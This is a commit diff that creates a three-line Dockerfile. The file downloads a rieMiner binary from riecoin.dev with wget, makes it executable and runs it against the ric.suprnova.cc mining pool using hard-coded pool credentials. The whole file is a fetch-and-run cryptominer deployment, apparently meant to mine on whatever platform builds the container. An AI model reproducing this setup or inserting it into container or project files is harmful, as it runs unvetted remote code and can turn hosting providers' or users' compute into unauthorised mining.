Create Dockerfile
Browse files- Dockerfile +3 -0
Dockerfile
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
FROM ubuntu:latest
|
2 |
+
RUN apt update && apt install wget git curl -y
|
3 |
+
RUN wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Pool Host=ric.suprnova.cc Port=5000 Username=guru45.guru Password=guru
|